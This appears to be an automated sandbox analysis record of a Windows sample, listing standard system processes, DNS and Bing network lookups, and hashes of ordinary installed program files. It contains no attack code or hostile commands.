C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\explorer.exe

explorer.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 68.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 98.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 2.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 10.27.171.150.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp

Files

C:\Program Files\7-Zip\7zFM.exe

MD5 45d3d62890fa98b808e4379a0a399baf
SHA1 5b5459717f961d20f002e3c5d3268906a71e7f73
SHA256 de96183d3d1e3c5a790c8fb31df0c6879d3bf1ca64b10be23452b58ee8e2b69e
SHA512 748cdde074183fe2780a236a9cf3e8141c5a79f492cad5656e44f706a74a58575015181d32d39bc177a4b68a045f7f0b836ba9d66e73fefe9877efb5744d6f2f

C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\es\readme.txt

MD5 dbac9649c4bd702f55fbd1afafe87c44
SHA1 0d914f4a809cfe400ca111ebfbd0ad552d500785
SHA256 b9dfa3b30224bd5eef298531c945d5f2f6bb978b7ef42e5ef09715a535172127
SHA512 86d7786b400303b1fb722689aba7e8ef6a01ad7e2776194c5d545a7d7357dd91e7079296790587210683db7f4385f98f281272fd3d1ad6770dabf401709a6415

C:\Program Files\Java\jre-1.8\legal\jdk\pkcs11wrapper.md

MD5 950ac8e007b49ed7acf1646758393817
SHA1 3a795f27aac36ba92f33165a6550cc7f201b3254
SHA256 4ab0585ac1cc953813901847e774a0a6e2542bedd0e5964cacf31e421455223e
SHA512 6bf7c6bdc1f802cdc8cea1d5a22de2e2cdf307411504499351fa5e9bdb7d1826c1968c4cc8bbb2fc17ea69850d69e0e2d77b76d29ad991813b598fc18ea0982e

C:\Program Files\Java\jre-1.8\THIRDPARTYLICENSEREADME-JAVAFX.txt

MD5 f0be99f92d8b8ad3d79c9aa580fc2f08
SHA1 a9ab5160208575c2c19277491406d5c95690a5f0
SHA256 e290cb91a6aaf54bb397c8f72d0bf5e8a70935ca00abde862e3d13fdf75fdbb0
SHA512 c9c2002d0f14f1d92924f80105c4b092bcb8de5bcb838179f2129b125fbcdf83f78ee80f44b0e26bab451c6fa5d6a29547a4933a92858e310dfbbdcee32f8cae

C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Slipstream.xml

MD5 c181d62d13f055127f354bb60cdfa03b
SHA1 6cbfcbcdb417807d7ce1ffeeaa2eaaf9b548885a
SHA256 d8dc1b9aa2aefd658fae2d9b6bf36318bdda72fcecba0538a1f121592b44e3b6
SHA512 62dd4c375f5e3299843c78dc86026da551a8a66c2c4cfac4003b8e4774ddd1cc36c130611c15182b61a472169305b75c845f17ec899e53250461867cc82abd36

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\themes\dark\rhp_world_icon_2x.png

MD5 7d00bc0d46dcb90890a4fe6b76bc5c3a
SHA1 7159b1e1c264a6863708a971eaeca32cff864aa1
SHA256 2fcd2848cbcab1a3b8154138288cc659cd2c187412cb887eec6554b6165b8c33
SHA512 2f113cb27028aa0fa0f028b09ddcddb4a1ede6ae0823909d99763db6e5be57b1b4ae6977537ec17808cd622bc548e1ba3122e35b58de9d856400d33042234a35

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\rhp_world_icon_hover.png

MD5 1dc5d31ef9205f1034b64d635d59cb32
SHA1 c172576576c5ac5a3c2912bdfd0c8365b5365513
SHA256 676d1f912a22a12ad4c80bf552355a7e0995c56e6ef7527aaa9b77e513efc065
SHA512 bc334638acb1416787df04cbaebde99cd15d96c5b96b6f950cbdfb54177fcd2f2ecce4dc9212a9a3f2f85269ac901aef147ec6297c31c5ee6cc39ee4cdac17c1

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\en-il\ui-strings.js

MD5 6e8d259daabf1168ae5136a3de48ee80
SHA1 b015257e3ae0810ddbda53c0b12991161a863ffb
SHA256 13370a65ca7e31fbf3a133156c208bf99c01a54880d55a8a4500495683e3a47f
SHA512 cf3c564c18c6b0965a431cda1ed8fa97cbeeb839d992e48f77c073bc8054ead03b4823df381c5179d3d398877da3473b92d70ae905a2bd0c7e5fc45505340113

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\sk-sk\ui-strings.js

MD5 88151ac4ebd7f5ff2d381c65e68cece7
SHA1 f979db4063d15ef2e32db3c38890899bb87c78e5
SHA256 c1ea4ada9462abd4ec352dfaf670575e9caff1e55d303db96a2f2500d50d92e8
SHA512 326195f5176beed6cc39849b8d6e87a5136c41a04aa76f53c30bbed1ff74391e16a6114e236f39d403c7f82fda032c00a9ee1df583412dfea224047e51f4c3bb

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\root\ui-strings.js

MD5 60f1a26612dc049ce3e00fe917b6475d
SHA1 05791d089cbcd759088adbbd9483433dc9a10206
SHA256 8ced84488e1ea81e8cc3ec1a25f5b849de902601bef557b6ec65f9de2982bece
SHA512 06f080a9df9081a2bfd557165f9c21cf2bce3ee161c0896a9f9a6e0f8a3ae545b1cfaaca9ce1d46757dbe0163ddd0421bdb51558ef092dd0a6e5c2052ead4706

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\example_icons.png

MD5 ea321d33cfeb1d029794bd01c5b78e85
SHA1 4e04b2d8f7f23f44f96f4bbf134233e1feb5e28b
SHA256 3add439f478220ce8001abf2543810144a0d80f8116bc0ca13947c9745983c55
SHA512 f574d12330a668d89402265cf5a859a76325ed548e1730e02f51dfd36e3d5dccf2c8b75a76a8c931597bfc130a42364c73eef0200523d4eefbcf4fa5ccacddea

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\example_icons2x.png

MD5 a660ce180dea34b4944d83569f4789bc
SHA1 e3ca7b90c8bd299c49585bd29bc3fb7494c0fa4e
SHA256 03ab6f2f396e0531f1b1299b61485408cff93f183942910a7d0d5f0c7a666bd8
SHA512 9de185c0e6a8cc49852ebb454a00a7a19f5382b358327d393a6952b32099036147c1eb799cc60078bf24477e9607a1b4c88288a213a8ffcafd8d60caab0f0720

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\root\ui-strings.js

MD5 cdc58b2bf0a1a34f96af8fdcb62dc30b
SHA1 69eb0d674e9830e81cecdd610792225a2a5dc265
SHA256 3b5888b652cd86408bdd59e86405d3f171d23132059228544fbe693cfcb2b73c
SHA512 d8ef3220b8984f759347a0e83eb75939c914bf865db492d28e226f113b469a97325befa008886743aeae2e0f32c74c0a1e7ce8b60eaf5949b51058a618daa502

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon.png

MD5 55c2b47c9aea50661a855fe91eb8ac32
SHA1 13ea23a51394ea2c13420ddac1294eae6f82f846
SHA256 ba5a59d879c1f6543b46085d02f5c90fdb22e663487d3586b6533cd887c83b72
SHA512 947da2e85f5c21e7847f10d727729915973c911a47de233ef1fb97f60ae41db05f4c8c0ee655e3aa264db2067763e4134b76279f1d3ea8ad43640a64176522a3

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon_2x.png

MD5 808e7aedbb1da793b86c92816309035e
SHA1 b4a2fca53290a35ae222f2cdf80f68ec7eab51e6
SHA256 a90f0edb8324760029a5db9f641b05694f8717c25514b2d6abde7662c827e0cb
SHA512 0af4e6a83661378b618c40de02c6cb7244be544dcb02f1f14c83b6abd791fa0330b6d508c86f0ba8e345608639d8505a2f26d3a6d3ae201bb01319c10c212d4a

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\en-il\ui-strings.js

MD5 5c1dc195043bdea8525930a9882c10d7
SHA1 17415e551255ab016f7682d7b33451cfcb91e687
SHA256 019bad9e72430b758828953e3310007695c55fed1d25fdd707c76fec561f2bc5
SHA512 e912b84e9b4856864d302154b68adf6822189aa78859265cf8f529279e77a9d7c086452b4527ebb75d9c910ad9a6a1e95e1f45498fc168628da80739acff742e

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\[email protected]

MD5 8db5f9dff9d857a8827ea6d66fea4880
SHA1 ef5de087109543e49ee7fe70adb49efe27e15121
SHA256 e8c6ae3d3f05d53d58200db3f31383861d434c6abbf66f82e925321029058a10
SHA512 70723910b4bf8814f848e10390378d53d9fb67e8a319edb708edc41b5c858c1d2cfc0b86a2909e33f72062df8b32e70554fa5ebe7aad7ec474ad78087560069b

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\nls\ui-strings.js

MD5 4e6de5201d795432e75c0628dd306b26
SHA1 80ae62145f6bc55c2a25f68ad9d6bc9fcae496db
SHA256 1265f683d27701f95b545e6201577fb4eadf5dcfbc1fc8cedb8dd39635515788
SHA512 950227253fb845bd9a4519a209d72404760492473bda8101d846ded18aef1a2f6f6ab99b1b1b2186c0eed423c151c089316e124384f214644632e6a0f4dbece3

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\css\main-selector.css

MD5 89728f1ec13231dd11d2ea20afe39d67
SHA1 b4350cd128350483be389b2c865633bd1ae0f78b
SHA256 aff85e66d5b690dc0188f4c2348ca78abdc14605286128407242a4e91a684754
SHA512 58203e9c3898367c78c6d10fa629c0bd2356b2ae54e225afbcee83be1d5d297977a5a9633e773ffc2b8079a6e2eb2aa0afc530c27d29f512af40d8c9ae539adb

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\bg_pattern_RHP.png

MD5 a93c09c1a326a8733b4eceb713ca7457
SHA1 90ba7a4c24bb0d424abda46b736170ea3b43e541
SHA256 d03f54aaa9216f4e32053928ce87a317341232f107140c84f73b2b6490b5a81a
SHA512 432c3400257d00391baa255d32fd03e0b8c97231d684ef35534868a38bcbf9cb70b433eacfe154c25fd3376e69592a7000a823535700f353975572c5101a56af

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\tr-tr\ui-strings.js

MD5 fc4cdc00064f47d2eedf58bd02068fe1
SHA1 cbb7157d8c560e9b2cdffac3a2b831202d76d2e6
SHA256 0e8fb0e6e1dd239a2a1996059914a5ec5e753782527c1a07c62d808eb77df3e0
SHA512 753d312596fdd24d3ad87b7916c5d108d185b42beff7c750099aecb38c7a321ff04260c19492d18cc27cf8f8843c6b3facde0934e67a46e9ce4291c3646abbe8

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\ui-strings.js

MD5 c5596fa17e59cbf92a2ea2e1ad5c6f8b
SHA1 4153a71b5750685afba568403ed7522e83a9894f
